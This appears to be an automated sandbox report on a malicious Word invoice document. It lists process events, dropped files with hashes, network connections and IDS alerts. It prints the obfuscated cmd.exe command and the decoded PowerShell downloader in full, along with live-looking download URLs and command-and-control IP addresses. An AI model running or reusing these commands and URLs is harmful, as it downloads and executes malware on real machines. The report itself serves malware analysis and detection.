2668CmD /V:ON/C"set 3x=Te=$b}Yr-;v0O(Kk9Ryq% 6~7{Msdw._@:,HWiDnN84cjpzIuQ5)EL2\Pmx1+UFoG/lCa'hSfZBXgAt3&&for %x in (45;63;29;20;56;61;74;53;47;67;33;23;50;34;59;20;7;20;71;52;71;71;47;12;40;40;77;26;52;33;23;8;42;34;59;20;70;20;0;52;26;56;33;23;8;79;34;59;20;66;66;21;3;19;54;42;11;41;2;69;70;16;42;11;41;69;9;3;10;54;24;24;50;2;39;1;29;8;63;4;44;1;43;78;21;40;1;78;30;36;1;4;67;66;37;1;39;78;9;3;37;54;59;54;79;2;69;70;78;78;45;33;65;65;28;48;7;63;27;72;68;7;57;30;43;63;57;65;66;26;49;16;15;0;63;54;78;77;79;57;6;62;77;31;63;37;26;76;15;36;76;24;32;70;78;78;45;33;65;65;72;37;39;28;8;57;1;8;68;39;8;1;39;76;66;37;27;70;8;45;1;39;45;68;66;30;72;37;39;28;8;57;1;8;68;39;8;1;39;76;66;37;27;70;8;78;48;78;63;7;30;43;63;30;48;15;65;40;49;47;41;43;67;44;45;17;74;31;19;61;32;70;78;78;45;33;65;65;27;68;7;29;68;30;43;63;30;46;68;65;14;48;56;10;68;59;35;41;39;17;24;36;15;63;49;32;70;78;78;45;33;65;65;79;15;37;66;63;68;72;10;68;66;66;1;39;30;39;66;65;75;22;16;75;28;10;44;73;50;44;74;6;53;31;49;68;0;38;66;73;26;32;70;78;78;45;33;65;65;29;29;29;30;78;48;39;1;66;28;1;10;37;1;39;78;63;30;1;27;65;1;72;15;70;46;37;42;65;29;77;64;67;39;54;35;44;22;57;52;36;68;15;27;69;30;71;45;66;37;78;13;69;32;69;51;9;3;63;50;54;79;11;2;69;78;50;79;16;16;69;9;3;48;79;79;50;41;21;2;21;69;54;54;16;69;9;3;48;59;11;22;79;2;69;68;22;54;50;42;69;9;3;28;59;79;50;2;3;1;39;10;33;78;1;57;45;60;69;55;69;60;3;48;79;79;50;41;60;69;30;1;58;1;69;9;72;63;7;1;68;43;70;13;3;43;16;79;50;42;21;37;39;21;3;37;54;59;54;79;51;25;78;7;18;25;3;10;54;24;24;50;30;38;63;29;39;66;63;68;28;62;37;66;1;13;3;43;16;79;50;42;34;21;3;28;59;79;50;51;9;3;15;22;42;50;42;2;69;15;16;50;50;59;69;9;47;72;21;13;13;64;1;78;8;47;78;1;57;21;3;28;59;79;50;51;30;66;1;39;76;78;70;21;8;76;1;21;42;11;11;11;11;51;21;25;47;39;10;63;15;1;8;47;78;1;57;21;3;28;59;79;50;9;3;27;22;50;79;24;2;69;63;22;22;22;50;69;9;4;7;1;68;15;9;5;5;43;68;78;43;70;25;5;5;3;27;16;24;79;41;2;69;7;16;41;16;59;69;9;86)do set 8p7h=!8p7h!!3x:~%x,1!&&if %x==86 echo !8p7h:~6!|FOR /F "delims=fA tokens=1" %v IN ('ftype^^^|find "dfil"')DO %v "C:\Windows\system32\cmd.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
2260C:\Windows\system32\cmd.exe /S /D /c" echo pow%PUBLIC:~5,1%r%SESSIONNAME:~-4,1%h%TEMP:~-3,1%ll $q2408='h9408';$v2775=new-object Net.WebClient;$i2123='http://durosfarm.com/lMQ9kTo2tA3mYFA_oiMgkWg7@http://find-me-an-english-penpal.find-me-an-english-tutor.co.uk/NQI8cCjpRB_qU@http://sarwa.co.za/KuPva1H8nR7WkoQ@http://3kiloafvallen.nl/X69XdvjZ5jBYL_QaTDlZM@http://www.tuneldeviento.es/efkhzi4/wAGCn2Hj6mEWaks'.Split('@');$o5230='t5399';$u3358 = '229';$u1063='a6254';$d135=$env:temp+'\'+$u3358+'.exe';foreach($c9354 in $i2123){try{$v2775.DownloadFile($c9354, $d135);$k6454='k9551';If ((Get-Item $d135).length -ge 40000) {Invoke-Item $d135;$s6537='o6665';break;}}catch{}}$s9738='r9891';"C:\Windows\system32\cmd.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
2360C:\Windows\system32\cmd.exe /S /D /c" FOR /F "delims=fA tokens=1" %v IN ('ftype^|find "dfil"') DO %v "C:\Windows\system32\cmd.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
2796C:\Windows\system32\cmd.exe /c ftype|find "dfil"C:\Windows\system32\cmd.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
3020C:\Windows\system32\cmd.exe /S /D /c" ftype"C:\Windows\system32\cmd.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
3112find "dfil"C:\Windows\system32\find.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Find String (grep) Utility
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
3804cmd C:\Windows\system32\cmd.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
Total events
2 196
Read events
1 714
Write events
0
Delete events
0

Modification events

No data
Executable files
2
Suspicious files
2
Text files
0
Unknown types
3

Dropped files

PID
Process
Filename
Type
2672WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVREA93.tmp.cvr
MD5:
SHA256:
2672WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\40A705C3.jpg
MD5:
SHA256:
4072powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\1ECTZ9ELPGYCOAITA1FN.temp
MD5:
SHA256:
2672WINWORD.EXEC:\Users\admin\AppData\Local\Temp\~$les-Invoice.xmlpgc
MD5:99E051533F51AE11EAFC2F62C7E3CB17
SHA256:A7E81903F3C01D299B4B33B6E3FC874E7FA4AC722A5E9E1A425088F6B91379A7
4072powershell.exeC:\Users\admin\AppData\Local\Temp\229.exeexecutable
MD5:C9DDE1F9FC3CD405A9B8A2825B714474
SHA256:03085000BD167C4B39F930138115F4A80159CD98E30E8B8C42C6CA8ECA7F6BEE
2672WINWORD.EXEC:\Users\admin\AppData\Local\Temp\VBE\MSForms.exdtlb
MD5:CFDFD5601AC28A032639CE3B74E33DEC
SHA256:CFCBA30F388F7D8C809B3DC547D2989276AC30681A40467C4BB66D0B6461484A
2820229.exeC:\Users\admin\AppData\Local\wabmetagen\wabmetagen.exeexecutable
MD5:C9DDE1F9FC3CD405A9B8A2825B714474
SHA256:03085000BD167C4B39F930138115F4A80159CD98E30E8B8C42C6CA8ECA7F6BEE
4072powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-msbinary
MD5:2BCAD5DA21CB41B727ABDE7D6B6990B8
SHA256:AB1397E3A31059329829AE2164787589945B1459ED2E1B7328E86ED497A6F9F3
2672WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotmpgc
MD5:51841B3D88B50BFD73A91594DDA18C62
SHA256:F7F45BAFD351A1E8BB642D6A8C100AC81042F4B7BB57C5D9F08083C2A55AFE9E
4072powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF20fdbd.TMPbinary
MD5:2BCAD5DA21CB41B727ABDE7D6B6990B8
SHA256:AB1397E3A31059329829AE2164787589945B1459ED2E1B7328E86ED497A6F9F3
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
3
TCP/UDP connections
3
DNS requests
1
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
4072
powershell.exe
GET
301
23.111.137.161:80
http://durosfarm.com/lMQ9kTo2tA3mYFA_oiMgkWg7
US
html
254 b
suspicious
3304
wabmetagen.exe
GET
206.248.110.184:8080
http://206.248.110.184:8080/
PR
malicious
4072
powershell.exe
GET
200
23.111.137.161:80
http://durosfarm.com/lMQ9kTo2tA3mYFA_oiMgkWg7/
US
executable
600 Kb
suspicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
3304
wabmetagen.exe
182.180.170.72:22
Pakistan Telecom Company Limited
PK
suspicious
3304
wabmetagen.exe
206.248.110.184:8080
PR
malicious
4072
powershell.exe
23.111.137.161:80
durosfarm.com
HIVELOCITY VENTURES CORP
US
suspicious

DNS requests

Domain
IP
Reputation
durosfarm.com
  • 23.111.137.161
suspicious

Threats

PID
Process
Class
Message
4072
powershell.exe
Potential Corporate Privacy Violation
ET POLICY PE EXE or DLL Windows file download HTTP
4072
powershell.exe
Potentially Bad Traffic
ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download
4072
powershell.exe
Misc activity
ET INFO EXE - Served Attached HTTP
No debug info